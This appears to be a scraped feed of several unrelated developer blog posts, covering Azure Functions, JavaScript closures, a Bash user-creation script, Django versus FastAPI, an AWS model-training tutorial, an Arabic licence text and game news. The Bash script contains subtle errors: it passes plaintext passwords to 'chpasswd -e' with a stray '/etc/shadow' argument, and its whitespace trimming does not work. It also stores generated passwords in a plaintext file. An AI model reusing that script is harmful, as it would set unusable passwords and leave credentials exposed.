Microsoft.AspNetCore.Http; using Microsoft.Extensions.Logging; using Newtonsoft.Json; public static class HttpTriggerExample { [FunctionName("HttpTriggerExample")] public static async Task<IActionResult> Run( [HttpTrigger(AuthorizationLevel.Function, "get", "post", Route = null)] HttpRequest req, ILogger log) { log.LogInformation("C# HTTP trigger function processed a request."); string name = req.Query["name"]; string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); dynamic data = JsonConvert.DeserializeObject(requestBody); name = name ?? data?.name; return name != null ? (ActionResult)new OkObjectResult($"Hello, {name}") : new BadRequestObjectResult("Please pass a name on the query string or in the request body"); } } ``` 3) Code Explanation: - The HttpTriggerExample function handles incoming HTTP requests. - It retrieves the name from query parameters (req.Query["name"]) or from the request body if provided in JSON format. Step 3: Configuring Triggers 1) HTTP Trigger Configuration: - In the Azure Functions portal, select your function. - Go to the "Triggers" tab and click on "+ Add trigger". - Choose "HTTP trigger" and configure details like HTTP method (GET, POST, etc.) and authorization options if needed. Conclusion In this article, we explored how to create a serverless application using Azure Functions. You learned how to configure an HTTP trigger, implement code to handle requests, and how to test your function using various HTTP request tools. Azure Functions simplifies the development and deployment of serverless applications, offering automatic scalability and a consumption-based pricing model. Experiment with different triggers and functions to build efficient and scalable applications in Azure.
dylantv
1,912,015
https://codepen.io/abpqaucj-the-builder/pen/abgoyjR)
تفضل، إليك الترجمة للنص باللغة العربية: حقوق الطبع والنشر © 2024 بواسطة ساندي حامد...
0
2024-07-04T22:03:39
https://dev.to/__eec1462357e217/httpscodepenioabpqaucj-the-builderpenabgoyjr-130m
تفضل، إليك الترجمة للنص باللغة العربية: --- حقوق الطبع والنشر © 2024 بواسطة ساندي حامد (https://codepen.io/abpqaucj-the-builder/pen/abgoyjR) يُمنح هنا إذن بدون أي تكلفة لأي شخص يحصل على نسخة من هذا البرنامج والملفات المستندة المرتبطة به (الـ "برنامج")، بالتعامل في البرنامج دون أي قيود، بما في ذلك بدون حصر الحق في استخدام ونسخ وتعديل ودمج ونشر وتوزيع وترخيص و/أو بيع نسخ من البرنامج، والسماح للأشخاص الذين يُقدم لهم البرنامج بالقيام بذلك، شريطة أن تُدرج إشعارات حقوق الطبع والنشر السابقة وهذا الإذن في جميع النسخ أو الأجزاء الكبيرة من البرنامج. البرنامج مُقدم "كما هو"، بدون أي ضمان من أي نوع، صريحًا أو ضمنيًا، بما في ذلك على سبيل المثال لا الحصر الضمانات المتعلقة بالتسويق أو اللياقة لغرض معين أو عدم الانتهاك. في أي حال من الأحوال، لا يتحمل المؤلفون أو أصحاب حقوق الطبع والنشر أي مسؤولية تجاه أي مطالبات أو أضرار أو مسؤوليات أخرى، سواء في إطار عقد أو جنحة أو غير ذلك، ناتجة عن أو متعلقة بالبرنامج أو استخدامه أو أي أمور أخرى متعلقة به.
__eec1462357e217
1,911,913
Introduction to Functional Programming in JavaScript: Closure #2
Closures are a fundamental concept in JavaScript that every developer should understand. They play a...
27,958
2024-07-04T22:00:00
https://dev.to/francescoagati/introduction-to-functional-programming-in-javascript-closure-2-4m4g
javascript
Closures are a fundamental concept in JavaScript that every developer should understand. They play a crucial role in functional programming and are essential for creating more advanced functionality in JavaScript applications. #### What is a Closure? A closure is a function that has access to its own scope, the scope of the outer function, and the global scope. This means that a closure can access variables and parameters from its own function scope, the scope of the function that contains it, and any global variables. In other words, a closure allows a function to "remember" the environment in which it was created, even after the outer function has finished executing. #### How Closures Work To understand how closures work, let's look at a simple example: ```javascript function outerFunction() { let outerVariable = 'I am from the outer function'; function innerFunction() { console.log(outerVariable); } return innerFunction; } const myClosure = outerFunction(); myClosure(); // Output: 'I am from the outer function' ``` In this example: - `outerFunction` creates a variable `outerVariable` and defines `innerFunction`, which accesses `outerVariable`. - `innerFunction` is returned from `outerFunction` and assigned to `myClosure`. - When `myClosure` is called, it still has access to `outerVariable` from `outerFunction`'s scope, even though `outerFunction` has already finished executing. This ability of the `innerFunction` to access the variables from the outer function's scope after the outer function has completed execution is what defines a closure. #### Practical Uses of Closures Closures have many practical applications in JavaScript. Let's explore a few common use cases: 1. **Data Encapsulation** Closures can be used to create private variables that cannot be accessed directly from outside the function. ```javascript function createCounter() { let count = 0; return { increment: function() { count++; return count; }, decrement: function() { count--; return count; } }; } const counter = createCounter(); console.log(counter.increment()); // 1 console.log(counter.increment()); // 2 console.log(counter.decrement()); // 1 ``` In this example, `count` is encapsulated within the closure created by `createCounter`, making it inaccessible from the outside. 2. **Function Factories** Closures can be used to create functions dynamically based on input parameters. ```javascript function createMultiplier(multiplier) { return function(number) { return number * multiplier; }; } const double = createMultiplier(2); const triple = createMultiplier(3); console.log(double(5)); // 10 console.log(triple(5)); // 15 ``` Here, `createMultiplier` returns a new function that multiplies its input by a specified `multiplier`. Each created function maintains its own `multiplier` value through closures. 3. **Callbacks and Event Handlers** Closures are often used in asynchronous programming, such as with callbacks and event handlers. ```javascript function fetchData(url) { return function(callback) { // Simulate an asynchronous operation setTimeout(() => { const data = `Data from ${url}`; callback(data); }, 1000); }; } const fetchFromAPI = fetchData('https://api.example.com'); fetchFromAPI((data) => { console.log(data); // Output after 1 second: 'Data from https://api.example.com' }); ``` In this example, `fetchData` returns a function that accepts a callback. This callback has access to the `url` variable even after the delay, demonstrating the power of closures in asynchronous code.
francescoagati
1,912,014
Automating User Management with a Bash Script
Managing users in a Linux environment can be daunting, especially when dealing with multiple users...
0
2024-07-04T21:57:26
https://dev.to/donfolayan/user-creation-automation-in-linux-with-bash-scripts-3p61
bashscript, cloud, linux, bash
Managing users in a Linux environment can be daunting, especially when dealing with multiple users and groups. We can leverage a Bash script to automate user creation, group assignment, and password management to streamline this process. This article walks through creating a robust user management script designed to automate these tasks while ensuring security and logging every step. This script was created for the [HNG Internship program](https://hng.tech/) and demonstrates practical scripting applications. ## Overview of the Script The script ensures it runs with root privileges, checks for an input file containing user data, and processes each user entry to create users, assign them to groups, and manage their passwords. Here’s a breakdown of each part of the script: - **Checking for Root Privileges:** The script starts by checking if it is run as the root user. This is crucial because user management commands require elevated privileges. ``` #!/bin/bash if [[ $EUID -ne 0 ]]; then echo "Error: This script requires root privileges." echo "Please run with sudo: sudo ./create_users.sh" exit 1 fi ``` - **Input File Validation:** Next, the script checks if an input file is provided. This file should contain user data formatted as username;group1,group2. ``` if [ $# -eq 0 ]; then echo "Error: Please provide an input file name as an argument." exit 1 fi input_file="$1" ``` - **Logging Function:** A logging function is defined to record actions taken by the script. This function writes messages to a log file with a timestamp. ``` log_message() { local message="$1" echo "$(date +'%Y-%m-%d %H:%M:%S') - $message" >> /var/log/user_management.log } ``` - **Group Addition Function:** The group_add function reads the groups from the input and adds the user to each group. It also creates any groups that do not exist. ``` group_add() { IFS=',' read -ra group_array <<< "$groups" for group in "${group_array[@]}"; do if ! getent group "$group" &>/dev/null; then groupadd "$group" log_message "Created group '$group'." fi usermod -a -G "$group" "$username" log_message "User: $username added to group: $group" done } ``` - **Directory and File Setup:** The script creates necessary directories and files for logging and storing user passwords securely. ``` mkdir -p /var/secure /var/log chmod 750 /var/secure /var/log touch /var/log/user_management.log chmod 640 /var/log/user_management.log touch /var/secure/user_passwords.csv chmod 600 /var/secure/user_passwords.csv ``` - **Processing the Input File:** The main part of the script reads each line from the input file, processes user data, and performs the following steps: 1. Removes leading/trailing whitespace. 2. Checks if the user already exists. 3. Creates new users and their home directories. 4. Assigns users to specified groups. 5. Generates and sets random passwords. 6. Logs each action for audit purposes. ``` while IFS=';' read -r username groups; do # Remove leading/trailing whitespace username="${username##* }" username="${username%% *}" groups="${groups##* }" groups="${groups%% *}" # Skip empty lines if [ -z "$username" ]; then continue fi # Check if user exists if id "$username" &>/dev/null; then log_message "User $username already exists" group_add continue else # Create user and personal group useradd -m -s /bin/bash "$username" log_message "Created user '$username' and group '$username'." fi # Create/add user to additional groups if [ -n "$groups" ]; then IFS=',' read -ra groupName <<< "$groups" for group in $(echo "$groups" | tr ',' ' '); do if ! getent group "$group" &>/dev/null; then groupadd "$group" log_message "Created group '$group'." fi usermod -a -G "$group" "$username" log_message "User: $username added to group: $group" done fi # Ensure home directory exists and set permissions home_dir="/home/$username" if [ ! -d "$home_dir" ]; then mkdir "$home_dir" fi chown "$username:$username" "$home_dir" chmod 700 "$home_dir" # Generate random password, store securely, and update log password=$(head /dev/urandom | tr -dc A-Za-z0-9 | fold -w 16 | head -n 1) echo "$username,$password" >> /var/secure/user_passwords.csv log_message "Generated password for user '$username' and stored securely." # Set user password echo "$username:$password" | chpasswd -e /etc/shadow # Successful user creation echo "User '$username' created successfully with password stored in /var/secure/user_passwords.csv (READ-ONLY)." log_message "User '$username' creation completed." done < "$input_file" echo "User creation script completed. Refer to /var/log/user_management.log for details." ``` ## Security Considerations The provided script demonstrates password storage in a plain text file. In a production environment, implement secure password management practices like password hashing or integration with a directory service. Additionally, the script should be run with least privilege principles in mind. ## Prerequisites Before using this file, ensure you have the following: - *Linux System:* The script is designed for use on Linux systems with Bash as the default shell. - *Bash Shell:* Basic understanding of Bash scripting is helpful. - *Essential Utilities:* The script utilizes utilities like useradd, groupadd, sed, chmod, openssl, chpasswd, and date. Make sure these are available on your system. - *Root Privileges:* The script requires running with root privileges to create user accounts and modify system directories. You can use sudo to run the script with elevated permissions. - *user_data.txt File:* This file needs to exist in the same directory as the script and define usernames and groups (one line per user, semicolon separated). This Bash script provides a comprehensive solution for automating user management in a Linux environment. By ensuring root privileges, validating input, and logging every action, it helps maintain security and auditability. The script can be further extended or customized to meet specific requirements, making it a valuable tool for system administrators. For further exploration of system administration and automation techniques, consider exploring the HNG Internship program (https://hng.tech/internship) or the HNG Premium membership (https://hng.tech/premium) for access to additional resources and professional development opportunities.
donfolayan
1,912,013
Why Still Use Django Over FastAPI?
As a developer, I continue to use Django despite all the hype around FastAPI. You might be thinking,...
0
2024-07-04T21:54:13
https://dev.to/seifalmotaz/why-still-use-django-over-fastapi-5b0d
python, django, fastapi, softwareengineering
As a developer, I continue to use Django despite all the hype around FastAPI. You might be thinking, "Dude, why complicate things? Just use FastAPI and make it simple." Let's dive into this topic by discussing some use case scenarios where Django still shines. ## My Work Context I work as a freelancer on various projects and also in a company setting. My primary role is as a mobile application developer using Dart/Flutter. This means that my work often involves creating MVPs (Minimum Viable Products) and startup projects that need to go into production as quickly as possible. This requires a software engineer to be mindful of several factors: ### Developer Time and Popularity First, there's the cost of developer time and the popularity of the language or framework being used. Choosing a well-known and widely-used framework can save time and resources in the long run. ### Speed and Efficiency Second, time is of the essence. As a developer, my main focus is on reducing the time spent developing and maintaining project code. This includes writing code, deploying it, migrating it, and testing it. Additionally, I need to be able to fix bugs quickly and add features as soon as possible, especially for startups. There's simply no time to be constantly migrating database schemas or worrying about the code not starting. ## The Solution: Why Django? To address these challenges, I focus on a few key points: ### Using Python Python is incredibly popular due to its ease of use and the robust libraries it offers. This makes it easy to get developers up to speed and working on a project quickly, especially if the project is well-documented (which, as a diligent software engineer, I ensure it is! 😊). ### Using Django As part of the Python ecosystem, Django is a robust framework that many rely on for production-ready applications. While it does have its downsides, which we'll discuss later, it offers several benefits that make it a solid choice over FastAPI: - **ORM (Object-Relational Mapping)**: Django's ORM simplifies database interactions, allowing for effortless migrations and providing an array of field types that cover almost every need a developer might have. - **Admin Panel**: The Django admin panel is one of my favorite features. It saves a tremendous amount of time for startups and clients by providing a ready-made interface to manage application data. While a custom admin panel might be necessary down the line, the default admin panel is a great starting point for early-stage projects. - **Extensions**: Django has a rich ecosystem of extensions that can be easily integrated, further speeding up the development process. - **Authentication**: Built-in authentication support in Django simplifies the implementation of user management, saving time and effort. Additionally, Django signals are a crucial feature for me. They provide a way to trigger events and execute code in response to changes in the data, eliminating the need to create a custom system for it. ## APIs for Mobile Applications Given that I primarily develop mobile applications, APIs are a crucial part of my work. To be fair, FastAPI does offer a significant benefit with its OpenAPI generated schema. This feature greatly enhances developer productivity by providing automatically generated API documentation. Front-end developers appreciate this as it allows them to get API docs quickly and use client-side generators with the OpenAPI file/code. ### Combining Django with Django Ninja To leverage this benefit, I use Django Ninja. While I'm not a fan of Django REST Framework (DRF) due to its performance and reliance on "magic," Django Ninja strikes a balance. It's similar to FastAPI in its simplicity and effective use of type hinting, but it doesn't overload with unnecessary features. Django Ninja also utilizes Pydantic for data validation, which adds to its robustness. ## Embracing the Magic of Django A lot of senior backend developers tend to dislike the "magic" that Django offers. However, as an experienced software engineer, I see this magic as a good thing—especially when you understand how it works behind the scenes. By reading the Django documentation and gaining familiarity with other frameworks like Flask, FastAPI, and SQLAlchemy, you can demystify the magic. This understanding enables you to appreciate the productivity boost that Django's abstractions provide. ## The Cons of Django While Django has many strengths, it's important to be aware of its limitations, especially when choosing it for a project. Here are some cons from my perspective, particularly in the context of building MVPs: ### Async Code Although Django 5 has introduced support for async code, it remains a fundamentally synchronous framework. Many of its components are not optimized for asynchronous operations, which can be a limitation if your project requires extensive async functionality. ### Performance and Memory Usage Django can be resource-intensive. A bare metal project using Django typically consumes at least 40 MB of RAM, which can be a lot compared to other frameworks. This can be a concern if you're working on a project with strict memory usage requirements. ### Real-Time Capabilities Django is not the best choice for applications that depend heavily on real-time features like WebSockets or Server-Sent Events (SSE). For projects requiring real-time communication, Python as a whole might not be the best option. In such cases, I would prefer using Node.js or Go, depending on the specific project requirements. # Conclusion In conclusion, while FastAPI presents compelling advantages in API generation and performance, Django remains my preferred choice for backend development in mobile application MVP projects. Its robust ecosystem, ease of use within the Python ecosystem, and productivity-enhancing features like the admin panel outweigh its limitations in async operations and real-time capabilities. Understanding these trade-offs ensures I can effectively choose and utilize Django for projects requiring rapid development and scalability.
seifalmotaz
1,912,011
[Game of Purpose] Day 47 - Sync engine with a battery
Today I implemented engine synchronization with a battery. When I turn the engine on, the battery is...
27,434
2024-07-04T21:45:45
https://dev.to/humberd/game-of-purpose-day-47-sync-engine-with-a-battery-oj6
gamedev
Today I implemented engine synchronization with a battery. When I turn the engine on, the battery is also starting to drain. When I turn the engine off the battery depletion stops. {% embed https://youtu.be/DbJU-rqd-dQ %}
humberd
1,912,010
В Battlefield 2042 анонсировали коллаборацию с Dead Space
Скоро в многопользовательском шутере Battlefield 2042 ожидается ранее незапланированное событие и...
0
2024-07-04T21:43:09
https://dev.to/lvgames______6d796a00b5ca/v-battlefield-2042-anonsirovali-kollaboratsiiu-s-dead-space-bbd
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8pqnjktvgl43pnskvsr6.jpg) Скоро в многопользовательском шутере [Battlefield 2042](https://lvgames.info/2024/07/05/v-battlefield-2042-anonsirovali-kollaboratsiyu-s-dead-space.html) ожидается ранее незапланированное событие и для некоторых игроков это будет необычно. Electronic Arts анонсировала кроссовер с Dead Space. Кроссовер состоится в рамках нового события «Вспышка», которое начнется 9 июля 2024 года и продлится до 16 июля 2024 года. Так что у вас будет неделя для завершения всех необходимых испытаний. «В событии «Прорыв» отряды продемонстрируют свою стойкость и изобретательность в борьбе с новым безжалостным врагом, в попытках побега из Лаборатории Борей», — говорится в нем. Приняв участие, вы сможете разблокировать бесплатные награды, такие как талисман для оружия и скин. Также появился уникальный фон карты игрока. Конечно же авторы не забыли об особом наборе для пользователей желающих вкинуть немного денег на специальный набор.
lvgames______6d796a00b5ca
1,912,009
Building Custom Generative Models with AWS: A Comprehensive Tutorial
Generative AI models have revolutionized the fields of natural language processing, image generation,...
0
2024-07-04T21:41:58
https://medium.com/@drishtijjain/building-custom-generative-models-with-aws-a-comprehensive-tutorial-d68f5f25e557
aws, llm, generative, ai
Generative AI models have revolutionized the fields of natural language processing, image generation, and more. Building and fine-tuning these models can seem daunting, but AWS offers a suite of tools and services to streamline the process. In this blog, we will walk through the steps to develop and fine-tune a custom generative model using AWS services. I’ll cover data preprocessing, model training, and deployment. ## Prerequisites Before we begin, ensure you have the following: - An AWS account - Basic knowledge of Python and machine learning - AWS CLI installed and configured ## Step 1: Setting Up Your AWS Environment ### 1.1. Creating an S3 Bucket Amazon S3 (Simple Storage Service) is essential for storing the datasets and model artifacts. Let’s create an S3 bucket. 1. Log in to the AWS Management Console. 2. Navigate to the S3 service. 3. Click on “Create bucket.” 4. Provide a unique name for your bucket and select a region. 5. Click “Create bucket.” ### 1.2. Setting Up IAM Roles IAM (Identity and Access Management) roles allow AWS services to interact securely. Create a role for your SageMaker and EC2 instances. 1. Navigate to the IAM service. 2. Click on “Roles” and then “Create role.” 3. Select “SageMaker” and then “SageMaker — FullAccess.” 4. Name your role and click “Create role.” ## Step 2: Preparing Your Data Data is the cornerstone of any AI model. For this tutorial, I’ll use a text dataset to build a text generation model. The data preprocessing steps involve cleaning and organizing the data for training. ### 2.1. Uploading Data to S3 1. Navigate to your S3 bucket. 2. Click “Upload” and select your dataset file. 3. Click “Upload.” ### 2.2. Data Preprocessing with AWS Glue AWS Glue is a managed ETL (Extract, Transform, Load) service that can help preprocess your data. 1. Navigate to the AWS Glue service. 2. Create a new Glue job. 3. Write a Python script to clean and preprocess your data. For example: {% embed https://gist.github.com/DrishtiJ/6c9871a961da6dbeaf3738aabb421620 %} 4. Run the Glue job and ensure the cleaned dataset is uploaded back to S3. ## Step 3: Training Your Generative Model with SageMaker Amazon SageMaker is a fully managed service that provides every developer and data scientist with the ability to build, train, and deploy machine learning models quickly. ### 3.1. Setting Up a SageMaker Notebook Instance 1. Navigate to the SageMaker service. 2. Click “Notebook instances” and then “Create notebook instance.” 3. Choose an instance type (e.g., ml.t2.medium for testing purposes). 4. Attach the IAM role you created earlier. 5. Click “Create notebook instance.” ### 3.2. Preparing the Training Script Next, prepare a training script. For this tutorial, we’ll use a simple RNN model using PyTorch. {% embed https://gist.github.com/DrishtiJ/34aace51e5a3cae2799fc8e3bbe2e497 %} ### 3.3. Training the Model 1. Open your SageMaker notebook instance. 2. Upload the training script. 3. Run the script to train the model. Ensure the training data is loaded from S3. ## Step 4: Fine-Tuning Your Model Fine-tuning involves adjusting hyperparameters or further training the model on a more specific dataset to improve its performance. ### 4.1. Hyperparameter Tuning with SageMaker 1. Navigate to the SageMaker service. 2. Click on “Hyperparameter tuning jobs” and then “Create hyperparameter tuning job.” 3. Specify the training job details and the hyperparameters to tune, such as learning rate and batch size. 4. Start the tuning job and review the results to select the best model configuration. ### 4.2. Transfer Learning Transfer learning can be employed by initializing your model with pre-trained weights and further training it on your specific dataset. {% embed https://gist.github.com/DrishtiJ/c390bfe38269efa9944dbc54ee074240 %} ## Step 5: Deploying Your Model Once your model is trained and fine-tuned, it’s time to deploy it for inference. ### 5.1. Creating a SageMaker Endpoint 1. Navigate to the SageMaker service. 2. Click on “Endpoints” and then “Create endpoint.” 3. Specify the model details and instance type. 4. Deploy the endpoint. ### 5.2. Inference with the Deployed Model Use the deployed endpoint to make predictions. {% embed https://gist.github.com/DrishtiJ/39eca269825e4a7feb9d0ad96f902bb3 %} Building custom generative models with AWS is a powerful way to leverage the scalability and flexibility of the cloud. By using services like S3, Glue, SageMaker, and IAM, you can streamline the process from data preprocessing to model training and deployment. Whether you’re generating text, images, or other forms of content, AWS provides the tools you need to create and fine-tune your generative models efficiently. Happy modeling! Thank you for reading. If you have reached so far, please like the article. Do follow me on [Twitter](http://twitter.com/drishtijjain) and [LinkedIn](http://linkedin.com/in/jaindrishti/) ! Also, my [YouTube Channel](http://youtube.com/drishtijjain) has some great tech content, podcasts and much more!
drishtijjain